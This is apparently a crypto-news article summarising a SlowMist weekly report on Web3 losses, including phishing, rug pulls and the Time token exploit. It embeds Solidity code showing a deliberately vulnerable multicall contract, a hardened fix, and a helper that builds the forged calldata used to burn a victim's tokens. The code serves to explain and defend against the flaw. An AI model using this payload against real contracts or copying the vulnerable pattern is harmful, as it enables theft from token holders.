Web3 Exploit Losses Decrease Following November's Surge in Attacks

One of the most alarming incidents involved a massive rug pull linked to the CKD token, resulting in losses exceeding $0.5 million.

Although the Web3 community's total losses last week were far smaller than the damage caused by November's incidents, some of the attacks, including the Time token compromise, were technically sophisticated.

The Web3 cybersecurity firm SlowMist has released its weekly incident report, which puts losses between December 3 and December 9 at nearly $1.91 million. That is higher than the roughly $225,000 estimated for November 26 to December 2, but it remains low next to the major hacks that hit the Web3 community in November, when overall losses surpassed $363 million.


One of the most notable incidents highlighted by SlowMist was the XAI phishing scam. On December 7, the blockchain security team posted on X that the Web3 gaming platform XAI "seems to be plagued by phishing."

XAI Phishing Overview
Source: SlowMist

"The attacker copied the official contract and sent the phishing link to the official Discord," SlowMist explained. Unfortunately, judging by the comments from the XAI community, the Layer 3 gaming solution was "too slow to delete the phishing link."

"It was deleted after someone shared that we bought through that CA, and it was being circulated in multiple groups, and the original CA was shared by the team like 30 minutes after the launch, which gave the chaos and phisher an advantage he took," X user Zosty and many others complained on the social media network (CA is community shorthand for contract address), arguing that XAI should bear responsibility for the financial damage, which has reached almost $846,000.


The second-largest exploit in SlowMist's report was the exit scam involving CKD TOKEN (CKD) on the Binance Smart Chain, one of the larger recent rug pulls, with losses of $539,000.

Other notable rug pulls hit the Abattoir of Zir (DIABLO) token, causing over $235,000 in losses, and the Strong Finance (STRONG) token, in which almost $61,000 was taken from investors.

Last week also saw the compromise of the Time (TIME) token, whose logic relies on Ethereum-based ERC20, ERC721 and ERC1155 smart contracts. The Web3 development toolkit Thirdweb reported the issue in its contracts on December 7.

In its detailed analysis of the event, SlowMist states that "The root cause of the vulnerability lies in the token contracts' simultaneous use of ERC-2771 (a standard technology for meta-transactions) and the Multicall library, used for batch execution of multiple function calls."

"The attacker exploits this by calling the 'execute' function of the Forwarder contract to invoke the multicall function of the token contract, thereby executing other functions within the contract (such as burning tokens)," SlowMist explains, adding that "This method successfully passes the isTrustedForwarder check of ERC-2771, ultimately interpreting the function caller as the last 20 bytes of the malicious 'calldata.'"

These manipulations tricked the smart contract into treating the forged address as the caller, which let the attacker burn a significant amount of Time tokens held by a liquidity pool. With the pool's balance reduced and the price skewed, the attacker reversed their initial token swap, draining additional funds from the pool.

SlowMist reports total losses of $190,000 and recommends developers "not to use Multicall and ERC2771Context together when programming token contracts."

If a project nonetheless needs both, SlowMist advises developers either to verify that the length of the "calldata" matches what the function expects or, alternatively, to use the latest official versions of the Multicall and ERC2771Context contracts provided by OpenZeppelin.
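The interaction SlowMist describes is easiest to see side by side, so the following is an added illustration (not Thirdweb's, OpenZeppelin's or the Time token's own code). ERC2771ContextLite and BurnableLite are minimal stand-ins for ERC2771Context and a burnable token; TimeTokenVulnerable is the unsafe combination, and TimeTokenHardened applies the approach OpenZeppelin adopted in its patched Multicall releases (4.9.4 and 5.0.1), which re-append the forwarder-verified sender suffix to every sub-call. The ForgedCalldata helper builds the payload shape from the quote above: a burn call with a victim address glued on as the trailing 20 bytes, wrapped in multicall and meant to be sent through the trusted forwarder's execute function.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Stand-in for OpenZeppelin's ERC2771Context (assumed name): one trusted
// forwarder, plus the ERC-2771 rule that the logical sender is the last 20
// bytes of calldata whenever msg.sender is that forwarder.
abstract contract ERC2771ContextLite {
    address private immutable _trustedForwarder;

    constructor(address trustedForwarder_) {
        _trustedForwarder = trustedForwarder_;
    }

    function isTrustedForwarder(address forwarder) public view virtual returns (bool) {
        return forwarder == _trustedForwarder;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 20;
    }

    function _msgSender() internal view virtual returns (address) {
        uint256 len = msg.data.length;
        if (isTrustedForwarder(msg.sender) && len >= _contextSuffixLength()) {
            return address(bytes20(msg.data[len - _contextSuffixLength():]));
        }
        return msg.sender;
    }
}

// Minimal token surface (assumed): only the function the attack needs.
abstract contract BurnableLite is ERC2771ContextLite {
    mapping(address => uint256) public balanceOf;

    function burn(uint256 amount) external {
        address from = _msgSender();   // forged under the vulnerable multicall
        balanceOf[from] -= amount;     // reverts on underflow in 0.8.x
    }
}

// VULNERABLE: each entry is delegatecalled unchanged. Inside the delegatecall
// msg.sender is still the forwarder, but msg.data is now the attacker-chosen
// entry, so its trailing 20 bytes are read back as the "verified" sender.
contract TimeTokenVulnerable is BurnableLite {
    constructor(address forwarder) ERC2771ContextLite(forwarder) {}

    function multicall(bytes[] calldata data) external returns (bytes[] memory results) {
        results = new bytes[](data.length);
        for (uint256 i = 0; i < data.length; i++) {
            (bool ok, bytes memory ret) = address(this).delegatecall(data[i]);
            require(ok, "multicall: subcall failed");
            results[i] = ret;
        }
    }
}

// HARDENED: when the outer call arrived via the trusted forwarder, the verified
// 20-byte suffix of the outer calldata is re-appended to every sub-call, so an
// attacker-supplied suffix inside data[i] is never the last 20 bytes.
contract TimeTokenHardened is BurnableLite {
    constructor(address forwarder) ERC2771ContextLite(forwarder) {}

    function multicall(bytes[] calldata data) external returns (bytes[] memory results) {
        bytes memory context = msg.sender == _msgSender()
            ? new bytes(0)
            : msg.data[msg.data.length - _contextSuffixLength():];
        results = new bytes[](data.length);
        for (uint256 i = 0; i < data.length; i++) {
            (bool ok, bytes memory ret) =
                address(this).delegatecall(bytes.concat(data[i], context));
            require(ok, "multicall: subcall failed");
            results[i] = ret;
        }
    }
}

// Builds the forged payload: burn(amount) with `victim` as the trailing 20
// bytes, wrapped in multicall. Relayed by the trusted forwarder to
// TimeTokenVulnerable it burns from `victim`; relayed to TimeTokenHardened the
// real sender is re-appended, so it burns from the attacker's own balance.
library ForgedCalldata {
    function build(address victim, uint256 amount) internal pure returns (bytes memory) {
        bytes[] memory inner = new bytes[](1);
        inner[0] = abi.encodePacked(
            abi.encodeWithSignature("burn(uint256)", amount),
            victim
        );
        return abi.encodeWithSignature("multicall(bytes[])", inner);
    }
}
```

The trailing victim bytes survive ABI decoding of burn(uint256) because Solidity only checks that calldata is at least as long as the declared parameters, which is exactly why the suffix convention works for the forwarder and fails under an unprotected multicall. SlowMist's other suggestion, checking calldata length, amounts to having multicall refuse (or strip) entries whose length does not match the target function's expected size; the re-append approach above avoids per-function length tables.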

Another incident mentioned in the SlowMist report is the Stargate snapshot scam of December 4. A scammer planted a phishing link inside a proposal vote on the Stargate platform and, by enticing more than 1,000 voters to stake their STG tokens through it, stole nearly $43,000.